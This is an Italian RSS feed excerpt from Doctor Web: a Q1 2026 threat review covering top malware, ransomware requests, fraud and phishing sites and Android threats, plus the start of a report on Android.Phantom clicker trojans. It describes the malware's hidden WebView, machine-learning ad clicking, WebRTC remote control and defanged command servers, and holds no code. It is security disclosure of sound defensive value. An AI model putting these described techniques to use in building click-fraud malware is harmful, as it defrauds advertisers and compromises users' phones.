&lt;p&gt;A gennaio gli esperti Doctor Web hanno parlato dei trojan clicker &lt;b&gt;Android.Phantom&lt;/b&gt;, che utilizzano il machine learning e lo streaming video per l'aumento artificiale dei clic su siti web. Inoltre, durante gli ultimi 3 mesi, abbiamo registrato la comparsa sullo store di app Google Play di ulteriori programmi malevoli, tra cui i trojan che iscrivono utenti a servizi a pagamento.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di I trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Diminuito il numero di minacce rilevate sui dispositivi protetti &lt;/li&gt;
        &lt;li&gt;Diminuito il numero di file unici tra le minacce rilevate&lt;/li&gt;
        &lt;li&gt;Registrate meno richieste di decriptazione di file colpiti da programmi trojan ransomware di criptazione, rispetto al periodo di osservazione precedente&lt;/li&gt;
        &lt;li&gt;Continuata la crescita dell'attività dei trojan bancari per dispostivi Android&lt;/li&gt;
        &lt;li&gt;Riscontrati dagli utenti i programmi malevoli clicker &lt;b&gt;Android.Phantom&lt;/b&gt;, che utilizzano, tra l'altro, le tecnologie di machine learning per manipolare i clic su siti web&lt;/li&gt;
        &lt;li&gt;Rilevati sullo store di app Google Play ulteriori programmi malevoli&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse di I trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;Trojan scritto nel linguaggio di programmazione Go e studiato per caricare nel sistema di destinazione vari cryptominer e software pubblicitari. Il programma malevolo è un file DLL e si trova in &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Per avviarsi, sfrutta la vulnerabilità di classe DLL Search Order Hijacking nel client torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;Adware.Downware.20655&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Software pubblicitario utilizzato come installer intermedio di programmi pirata.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un componente malevolo di un'estensione browser WinSafe. Questo componente rappresenta uno script JavaScript che visualizza pubblicità invadenti nei browser.&lt;/dd&gt;
    &lt;dt&gt;Adware.Siggen.33379&lt;/dt&gt;
    &lt;dd&gt;Falsa estensione di blocco di pubblicità per browser Adblock Plus, che viene installata nel sistema da altre applicazioni malevole allo scopo di visualizzazione di annunci pubblicitari.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Statistiche delle applicazioni malevole nel traffico email&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse nel traffico email di I trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;JS.DownLoader.1225&lt;/dt&gt;
    &lt;dd&gt;Rilevamento euristico per gli archivi ZIP contenenti script JavaScript con nomi sospetti.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Exploit per l'utilizzo di vulnerabilità nel software Microsoft Office, che consentono di eseguire codice arbitrario.&lt;/dd&gt;
    &lt;dt&gt;JS.Redirector.514&lt;/dt&gt;
    &lt;dd&gt;Script malevolo che reindirizza l'utente a una pagina web controllata dai malintenzionati.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Ransomware di criptazione&lt;/h3&gt;

&lt;p&gt;Nel I trimestre 2026, le richieste di decriptazione di file colpiti da trojan ransomware di criptazione sono diminuite del 31,51% rispetto al IV trimestre dell'anno scorso. Il calo si è verificato nel contesto del prolungato periodo delle festività di Capodanno e dei relativi giorni non lavorativi, durante il quale alcuni cybercriminali potevano sospendere la propria attività e andare in vacanza. Inoltre, gli utenti che hanno subito attacchi dei trojan ransomware di criptazione durante questo periodo probabilmente non hanno reagito immediatamente agli incidenti avvenuti.&lt;/p&gt;

&lt;p&gt;Dinamica del numero di richieste di decriptazione pervenute al Servizio di supporto tecnico Doctor Web:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Ransomware di criptazione più diffusi di I trimestre 2026&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 15.59% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.29750&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3.23% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868 &lt;/b&gt; — 3.23% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.26996&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 1.62% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44383 &lt;/b&gt; — 1.61% di richieste utente&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Frode online&lt;/h3&gt;

&lt;p&gt;Durante i 3 mesi passati, gli analisti internet dell'azienda Doctor Web hanno individuato una serie di nuovi falsi siti di marketplace. Su questi siti i truffatori suggeriscono di partecipare a una "svendita" di ordini presumibilmente non ritirati. Lo schema fraudolento consiste in quanto segue: le merci da ordini "non reclamate" sono suddivise in diverse categorie (elettronica, abbigliamento, calzature, cosmetici ecc.) e presumibilmente verrebbero riunite nelle relative scatole a sorpresa. Il contenuto di queste ultime è ignoto e potrà includere, tra l'altro, oggetti di valore. Alle potenziali vittime viene offerta la possibilità di acquistare tali scatole a un prezzo relativamente basso, il che rappresenta l'esca principale.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/04_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/04_market.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso sito web di marketplace promette una "svendita degli ordini non reclamati" che presumibilmente sovraccaricano i magazzini&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Quando un utente sceglie una delle scatole, gli viene chiesto di finalizzare l'ordine e indicare i propri dati personali che possono includere il nome e cognome, il numero di cellulare e l'indirizzo email. Quindi l'utente viene reindirizzato a una pagina di pagamento tramite SBP (nota: Sistema di pagamenti rapidi russo). In fin dei conti, la vittima perde il denaro e trasferisce ai truffatori le proprie informazioni confidenziali.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/05_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/05_market.2.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/06_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/06_market.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Dopo aver finalizzato "l'ordine", la vittima viene invitata a pagarlo tramite Sistema di pagamenti rapidi&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I nostri esperti, inoltre, hanno trovato molteplici siti di servizi web che offrono gli svariati servizi finanziari, ad esempio: la possibilità di ottenere rapidamente un microcredito, un prestito o di sottoporsi alla procedura fallimentare. Tali servizi web stessi non forniscono queste prestazioni, come lo si aspetterebbero gli utenti, e sono solo intermediari tra clienti e istituti finanziari. Quello che forniscono dietro pagamento è l'accesso a una selezione di varianti potenzialmente adatte, benché un'aggregazione di simili offerte finanziarie sia disponibile in fonti gratuite. Oltre a ciò, questi servizi web non garantiscono esiti positivi se si presenta una domanda. Per di più, il pagamento dell'accesso non è una tantum, ma rappresenta un abbonamento con addebiti periodici.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/07_finance.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/07_finance.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei siti dove l'accesso al servizio web di selezione di offerte finanziarie è a pagamento e formalizzato come abbonamento&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In alcuni casi, tali risorse possono fuorviare utenti offrendo un determinato servizio, ad esempio la ricerca di lavoro, ma fornendo dopo l'iscrizione l'accesso alle stesse offerte finanziarie di ottenimento di prestiti, microcrediti ecc.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/08_job.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/08_job.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito web promette assistenza nella ricerca di lavoro, ma una volta pagato l'accesso al servizio web, invece di un elenco di offerte di lavoro, potrebbe fornire le offerte finanziarie di prestiti, microcrediti ecc. dai partner&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I siti di phishing rilevati nel I trimestre includevano, in particolare, false risorse internet che sfruttavano il tema di una gara sportiva di beneficenza chiamata "Maratona verde". Invitano i visitatori a registrarsi per partecipare alla maratona, tuttavia, questi siti non hanno niente a che fare con l'evento e sono creati per raccogliere i dati confidenziali degli utenti.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/09_maraphon.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/09_maraphon.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei falsi siti che sfruttano il tema "Maratona verde"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Gli analisti internet Doctor Web hanno rilevato anche ulteriori falsi siti di servizi web di investimento presumibilmente legati a diversi istituti di credito. Tra di essi erano siti orientati al pubblico da Russia, Kazakistan e altri paesi. I truffatori promettono alti profitti alle potenziali vittime, le quali, per "accedere" alle piattaforme di pseudo investimento, devono completare un breve sondaggio e registrare un account indicando le proprie informazioni personali.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito di phishing che i malintenzionati spacciano per la risorsa ufficiale del servizio web di investimento di una delle banche russe&lt;/em&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito di phishing che i malintenzionati spacciano per la risorsa ufficiale del servizio web di investimento di uno degli istituti di credito di Kazakistan&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb-av.it/dangerous_urls/"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h3&gt;

&lt;p&gt;Secondo i dati delle statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel I trimestre 2026 è continuata la crescita dell'attività dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, osservata nel IV trimestre dell'anno precedente. I più diffusi tra di essi sono stati i campioni della sottofamiglia &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;. Allo stesso tempo, di nuovo è diminuito il numero di rilevamenti dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Tra i software potenzialmente pericolosi individuati, sono stati leader i programmi in cui tramite strumenti di modding è inserito il codice spazzatura (vengono rilevati come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). Tale metodo al momento viene attivamente impiegato per proteggere i trojan bancari dal rilevamento da parte degli antivirus. Inoltre, come in precedenza, sono state frequenti le applicazioni modificate tramite l'utility NP Manager (vengono rilevate come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.NPMod&amp;lng=it"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;I software indesiderati rilevati più frequentemente sono stati i falsi antivirus &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, che, per "eliminare" le minacce presumibilmente identificate, richiedono l'acquisto di una versione completa. I software pubblicitari più attivi nel I trimestre si sono rivelati i programmi &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; e &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Quelli primi sono applicazioni di ottimizzazione che creano notifiche di presunti memoria insufficiente ed errori di sistema per visualizzare pubblicità durante "l'ottimizzazione". Quelli secondi sono falsi programmi di cheat per l'ottenimento di varie risorse in giochi, ma in realtà solo caricano siti web con annunci pubblicitari.&lt;/p&gt;

&lt;p&gt;A gennaio 2026 il nostro laboratorio antivirus &lt;a href="https://news.drweb-av.it/show/?i=15110" target="_blank"&gt;ha avvertito&lt;/a&gt; dei trojan clicker &lt;b&gt;Android.Phantom&lt;/b&gt;. Queste applicazioni malevole utilizzano il machine learning e lo streaming video per l'aumento artificiale dei clic su siti web. I cybercriminali li distribuivano in più modi: tramite lo store GetApps per dispositivi Xiaomi, canali Telegram, server Discord, raccolte software di terze parti e attraverso siti malevoli.&lt;/p&gt;

&lt;p&gt;Durante i 3 mesi scorsi, gli analisti di virus Doctor Web hanno identificato sullo store di app Google Play nuove minacce, tra cui erano le applicazioni trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; studiate per iscrivere utenti a servizi a pagamento.&lt;/p&gt;

&lt;p&gt;Eventi più importanti relativi alla sicurezza "mobile" in I trimestre&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; sono diventati le minacce per dispositivi Android più diffuse&lt;/li&gt;
    &lt;li&gt;Cybercriminali utilizzavano più spesso utility per il modding di applicazioni Android per proteggere trojan bancari dal rilevamento da antivirus&lt;/li&gt;
    &lt;li&gt;Continuata la tendenza alla diminuzione dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;Utenti riscontravano i trojan &lt;b&gt;Android.Phantom&lt;/b&gt;, che utilizzano il machine learning e streaming video per l'aumento artificiale dei clic su siti web&lt;/li&gt;
    &lt;li&gt;Sullo store di app Google Play di nuovo venivano distribuite applicazioni malevole&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel I trimestre 2026 leggete la nostra &lt;a href="https://news.drweb-av.it/show/review/?i=15136" target="_blank"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15134&amp;lng=it</guid><title>Soluzione per la protezione di PC Dr.Web premiata con SKD AWARDS</title><link>https://news.drweb-av.it/show/?i=15134&amp;lng=it&amp;c=5</link><pubDate>Tue, 24 Mar 2026 15:46:11 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;La soluzione per la protezione di PC Dr.Web Security Space di nuovo è stata insignita del premio di settore SKD AWARDS. Dr.Web Security Space si è aggiudicata il riconoscimento come migliore nella categoria "Antivirus per PC".&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Per Doctor Web questo è già il terzo tale premio di seguito. Nel &lt;a href="https://news.drweb-av.it/show/?lng=it&amp;amp;i=14677"&gt;2023&lt;/a&gt; Dr.Web Security Space 12.0 per Windows ha vinto nella categoria "Sicurezza di personal computer", nel &lt;a href="https://news.drweb-av.it/show/?i=14800&amp;amp;lng=it"&gt;2024&lt;/a&gt; la soluzione antivirus per PC si è confermata la migliore, mentre Dr.Web Mobile Engine SDK ha vinto nella categoria "Motori antivirus".&amp;nbsp;&lt;/p&gt;&lt;p&gt;SKD AWARDS è un premio annuale organizzato da SKD Labs, laboratorio indipendente di fama mondiale di test e certificazione nel campo della sicurezza informatica. In modo informale questo premio è chiamato "Oscar per i prodotti di cybersecurity" ed esso viene considerato come uno degli indicatori importanti nella valutazione dell'efficacia dei prodotti specializzati.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Nell'ambito del premio, i prodotti vengono sottoposti a una serie di test, durante i quali vengono valutati le loro funzionalità, prestazioni, innovazioni tecniche, il loro comportamento in scenari reali, la loro capacità di rilevamento delle minacce e di risposta ad esse.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/f2_admin/drweb-ss.jpg" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/drweb-ss.jpg" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15110&amp;lng=it</guid><title>Trojan della famiglia Android.Phantom entrano negli smartphone insieme a giochi e mod pirata di popolari applicazioni. Utilizzano il machine learning e streaming video per l'aumento artificiale dei clic</title><link>https://news.drweb-av.it/show/?i=15110&amp;lng=it&amp;c=5</link><pubDate>Wed, 21 Jan 2026 04:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;21 gennaio 2026&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;newslead&gt;Gli specialisti del laboratorio antivirus Doctor Web hanno rilevato e studiato una nuova famiglia di trojan con funzionalità di clicker. Li accomuna una particolarità: o vengono gestiti da un server con il nome &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, o vengono scaricati ed eseguiti su suo comando. Il malware di questo tipo infetta gli smartphone con SO Android.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Uno dei canali di distribuzione dei trojan è lo store di applicazioni ufficiale per i dispositivi Xiaomi GetApps.&lt;/p&gt;&lt;div class="img img-two-v same-height mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Abbiamo potuto identificare più giochi mobili contenenti il malware: Creation Magic World (oltre 32mila download), Cute Pet House (&amp;gt;34mila download), Amazing Unicorn Party (&amp;gt;13mila download), Akademia mechty Sakura (&amp;gt;4mila download), Theft Auto Mafia (&amp;gt;61mila download), Open World Gangsters (&amp;gt;11mila download). Tutti i giochi infetti sono pubblicati a nome di uno stesso sviluppatore, SHENZHEN RUIREN NETWORK CO., LTD., i trojan sono incorporati in essi e vengono avviati insieme alle app.&lt;/p&gt;&lt;p&gt;Le versioni originali dei giochi non contenevano il malware. Il 28/29 settembre lo sviluppatore pubblica aggiornamenti per i giochi, in cui è incorporato il trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;. Esso funziona in due modalità che nel codice del programma sono condizionalmente chiamate modalità segnalazione (signaling) e fantasma (phantom).&lt;/p&gt;&lt;p&gt;In modalità phantom il software malevolo utilizza un browser incorporato su base del widget WebView, nascosto all'utente. In esso, su comando da un server con il nome &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;, viene caricato un sito target per l'aumento artificiale dei clic e un file JavaScript "phantom". Quest'ultimo contiene uno scenario per l'automazione delle attività sugli annunci pubblicitari del sito caricato e il framework di machine learning TensorFlowJS. Un modello per questo framework viene scaricato dal server &lt;span class="string"&gt;hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com&lt;/span&gt; nella directory dell'applicazione. Negli scenari per l'elaborazione di alcune tipologie di pubblicità,&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;posiziona il browser su uno schermo virtuale e cattura screenshot. Il trojan li analizza con l'ausilio del modello per il framework TensorFlowJS, e quindi fa clic sugli elementi identificati.&lt;/p&gt;&lt;p&gt;In modalità alternativa signaling il trojan si connette a un server estraneo tramite WebRTC. Questa tecnologia consente ai browser e applicazioni di instaurare una connessione diretta per lo scambio di dati, audio e video in tempo reale senza installazione di ulteriori software. In modalità signaling il server già menzionato &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; il ruolo di server di segnalazione, stabilendo connessioni tra nodi WebRTC. Inoltre, questo server determina la modalità di funzionamento del trojan, phantom o signaling. I task con i siti target arrivano da &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;. Quindi&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;all'oscuro dell'utente trasmette ai malintenzionati il video dello schermo virtuale con il sito caricato nel browser. Il trojan dà la possibilità al nodo connesso WebRTC di gestire in remoto il browser sullo schermo virtuale: fare clic, scorrimenti, digitare o incollare testi in moduli di input.&lt;/p&gt;&lt;p&gt;Il 15/16 ottobre i suddetti giochi hanno ricevuto un altro aggiornamento. In aggiunta a&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;, è stato incorporato in essi un modulo denominato&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. È un dropper che contiene al suo interno un downloader di codice remoto&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.4.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;. Questo programma scarica altri trojan ancora, progettati per simulare clic su vari siti web. Questi moduli sono più semplici del clicker&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;— non utilizzano il machine learning o lo streaming video, ma si appoggiano sugli scenari per l'esecuzione di clic, scritti in JavaScript.&lt;/p&gt;&lt;p&gt;Per utilizzare la tecnologia WebRTC su Android, il trojan deve connettere una libreria speciale con Java API che non fa parte del SO standard e delle applicazioni scaricate. Pertanto, inizialmente il trojan funzionava prevalentemente in modalità phantom. Con l'aggiunta alle applicazioni di&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;, il trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;ha ricevuto la possibilità di utilizzare il downloader di codice remoto&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.4.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;per scaricare la libreria richiesta.&lt;/p&gt;&lt;p&gt;I malintenzionati utilizzano anche altri canali di distribuzione dei trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;e&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. Ad esempio, mod dello streaming di musica Spotify con funzionalità premium sbloccate. Vengono pubblicate su vari siti web, eccone alcuni esempi:&lt;/p&gt;&lt;div class="flex justify-center gap-3"&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sito Spotify Plus&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sito Spotify Pro&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;E in canali Telegram speciali:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Pro&lt;/i&gt;&lt;br&gt;&lt;i&gt;(54.400 